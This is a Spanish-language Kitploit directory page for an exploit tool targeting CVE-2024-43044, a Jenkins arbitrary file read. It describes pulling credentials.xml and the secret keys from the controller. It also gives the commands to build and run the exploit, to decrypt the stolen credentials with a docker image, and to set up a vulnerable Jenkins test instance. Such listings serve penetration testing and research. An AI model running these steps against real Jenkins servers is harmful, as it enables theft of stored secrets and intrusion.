Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2024-43044-jenkins-creds — Exploit para CVE-2024-43044 que permite la lectura arbitraria de archivos desde el controlador de Jenkins para extraer y descifrar credentials.xml usando claves secretas. | Kitploit
Herramientas/GitHubGitHub/dacc4/cve-2024-43044-jenkins-creds
Herramientas de Cifrado/DescifradoAnálisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de Penetración
GitHubdacc4/cve-2024-43044-jenkins-creds

CVE-2024-43044-jenkins-creds

Exploit para CVE-2024-43044 que permite la lectura arbitraria de archivos desde el controlador de Jenkins para extraer y descifrar credentials.xml usando claves secretas.

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir
Ver Repositorio
4hace 1 añoAún no revisado

Introducción

Este es un exploit para CVE-2024-43044, una lectura de archivos arbitraria que permite a un agente obtener archivos del controlador.

El exploit utilizará la vulnerabilidad para leer el archivo credentials.xml y obtener las claves secretas para descifrarlo.

Código inicial : https://github.com/convisolabs/CVE-2024-43044-jenkins Análisis original : https://blog.convisoappsec.com/en/analysis-of-cve-2024-43044/

Compilando el exploit

root@kitploit:~
mvn package

Ejecutando el exploit

root@kitploit:~
java -jar exploit.jar mode_secret <jenkinsUrl> <nodeName> <nodeSecretKey>

Descifrar credentials.xml

root@kitploit:~
docker run \
  --rm \
  --network none \
  --workdir / \
  --mount "type=bind,src=$PWD/master.key,dst=/master.key" \
  --mount "type=bind,src=$PWD/hudson.util.Secret,dst=/hudson.util.Secret" \
  --mount "type=bind,src=$PWD/credentials.xml,dst=/credentials.xml" \
  docker.io/hoto/jenkins-credentials-decryptor:latest \
  /jenkins-credentials-decryptor \
    -m master.key \
    -s hudson.util.Secret \
    -c credentials.xml \
    -o json

Probando

Puedes probarlo en una versión vulnerable usando docker:

root@kitploit:~
docker run -p 8080:8080 -p 50000:50000 --restart=on-failure jenkins/jenkins:2.441-jdk17

Una vez que tengas Jenkins ejecutándose, configura un agente.

Descargar herramienta